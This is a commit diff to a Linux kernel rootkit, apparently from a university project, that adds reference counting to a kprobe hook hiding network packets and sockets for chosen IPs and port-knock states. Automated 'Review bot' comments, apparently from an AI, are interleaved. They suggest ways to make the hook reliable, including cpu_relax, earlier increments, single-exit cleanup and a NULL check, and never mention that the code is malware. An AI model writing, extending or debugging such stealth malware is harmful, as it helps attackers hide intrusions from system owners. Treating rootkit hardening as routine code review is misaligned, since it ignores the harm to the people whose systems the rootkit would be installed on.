commit 110f0b2180f1b8c0bdc20f7c62ba9c12e6600c8a
parent 40cae9d371a3d81fac079086fb815e03df98b907
Author: deurzen <m.deurzen@tum.de>
Date: Sun, 10 Jan 2021 14:42:23 +0100
fixes issues
Diffstat:
3 files changed, 15 insertions(+), 5 deletions(-)
diff --git a/src/hook.c b/src/hook.c
@@ -32,11 +32,13 @@ void **sys_calls;
atomic_t read_install_count;
atomic_t getdents_install_count;
atomic_t tty_read_install_count;
+atomic_t packet_rcv_install_count;
atomic_t read_count;
atomic_t getdents_count;
atomic_t getdents64_count;
atomic_t tty_read_count;
+atomic_t packet_rcv_count;
asmlinkage ssize_t (*sys_read)(const struct pt_regs *);
asmlinkage long (*sys_getdents)(const struct pt_regs *);
@@ -69,6 +71,7 @@ init_hooks(void)
atomic_set(&tty_read_count, 0);
atomic_set(&getdents_count, 0);
atomic_set(&getdents64_count, 0);
+ atomic_set(&packet_rcv_count, 0);
sys_read = (void *)sys_calls[__NR_read];
sys_getdents = (void *)sys_calls[__NR_getdents];
diff --git a/src/hook.h b/src/hook.h
@@ -21,6 +21,7 @@ extern atomic_t read_count;
extern atomic_t tty_read_count;
extern atomic_t getdents_count;
extern atomic_t getdents64_count;
+extern atomic_t packet_rcv_count;
extern asmlinkage ssize_t (*sys_read)(const struct pt_regs *);
extern asmlinkage long (*sys_getdents)(const struct pt_regs *);
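Review bot: This hunk declares `packet_rcv_count` but adds no matching `extern atomic_t packet_rcv_install_count;`, even though the commit moves that definition from src/packhide.c to src/hook.c and unhide_packets in packhide.c still uses it. If the install counters are not already declared above line 21 of this header (outside the hunk), packhide.c is left without a declaration for the symbol. Adding the extern next to the new line would keep the two packet_rcv counters declared together.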
diff --git a/src/packhide.c b/src/packhide.c
@@ -17,8 +17,6 @@
extern rootkit_t rootkit;
-atomic_t packet_rcv_install_count;
-
ip_list_t hidden_ips = {
.ip = { 0 },
.version = -1,
@@ -76,11 +74,12 @@ hide_packets(void)
void
unhide_packets(void)
{
- if (atomic_dec_return(&getdents_install_count) < 1) {
+ if (atomic_dec_return(&packet_rcv_install_count) < 1) {
DEBUG_INFO("___ UNHIDING PACKETS %d, %d\n", rootkit.hiding_packets, rootkit.hiding_sockets);
unregister_kprobe(&p_rcv);
unregister_kprobe(&tp_rcv);
unregister_kprobe(&p_rcv_spkt);
+ while (atomic_read(&packet_rcv_count) > 0);
}
}
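Review bot: The added `while (atomic_read(&packet_rcv_count) > 0);` spins with an empty body and no upper bound, so if any handler path returns without its matching decrement, the loop never exits and pins a CPU in kernel context. At minimum the body should be `cpu_relax();`. The loop also needs a comment saying what it waits for, for example `/* wait until no g7_packet_rcv handler is still running */`. It runs only after the three unregister_kprobe() calls, so it covers handlers already in flight rather than new ones, and the comment should say so.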
@@ -137,6 +136,8 @@ g7_packet_rcv(struct kprobe *kp, struct pt_regs *pt_regs)
struct sk_buff *clone = skb_clone(skb, GFP_KERNEL);
pt_regs->di = (long unsigned int)clone;
+ atomic_inc(&packet_rcv_count);
+
if (ver == 0x60) {
struct ipv6hdr *iphdr;
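Review bot: `atomic_inc(&packet_rcv_count)` comes after `skb_clone()` and the `pt_regs->di` write, so a handler that has been entered but has not yet reached the increment is not counted. The wait loop this commit adds in unhide_packets can therefore read zero while that handler is still running. Making the increment the first statement of g7_packet_rcv narrows the gap, but the start of the function is outside this hunk, so I cannot see what precedes it. In the visible lines `clone` is also stored into `pt_regs->di` and later dereferenced without a NULL check, and a failed skb_clone() would then oops the host.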
@@ -163,8 +164,10 @@ g7_packet_rcv(struct kprobe *kp, struct pt_regs *pt_regs)
|| list_contains_ip(&hidden_ips, (u8 *)&iphdr->daddr, v4))
clone->pkt_type = PACKET_LOOPBACK;
}
- } else
+ } else {
+ atomic_dec(&packet_rcv_count);
return 0;
+ }
if (rootkit.hiding_sockets) {
// We need to intercept (RST) the TCP handshake
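Review bot: Every return now needs its own `atomic_dec(&packet_rcv_count)`, added here in the `else` branch and again in the hunks at -174 and -215, so any return that was missed in the lines between those hunks leaves the counter above zero for good. A single exit is less fragile: replace each early `return 0;` with `goto out;` and end the function with `out: atomic_dec(&packet_rcv_count); return 0;`. The code between the hunks is not shown, so this diff cannot confirm that all paths are currently balanced.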
@@ -174,8 +177,10 @@ g7_packet_rcv(struct kprobe *kp, struct pt_regs *pt_regs)
tcphdr = (struct tcphdr *)skb_transport_header(skb);
unsigned src_port = (unsigned)ntohs(tcphdr->source);
- if (list_contains_knock(&ips_stage3, ip, version))
+ if (list_contains_knock(&ips_stage3, ip, version)) {
+ atomic_dec(&packet_rcv_count);
return 0;
+ }
if (tcphdr->syn || !tcphdr->ack)
goto check_port;
@@ -215,6 +220,7 @@ check_port:
}
}
+ atomic_dec(&packet_rcv_count);
return 0;
}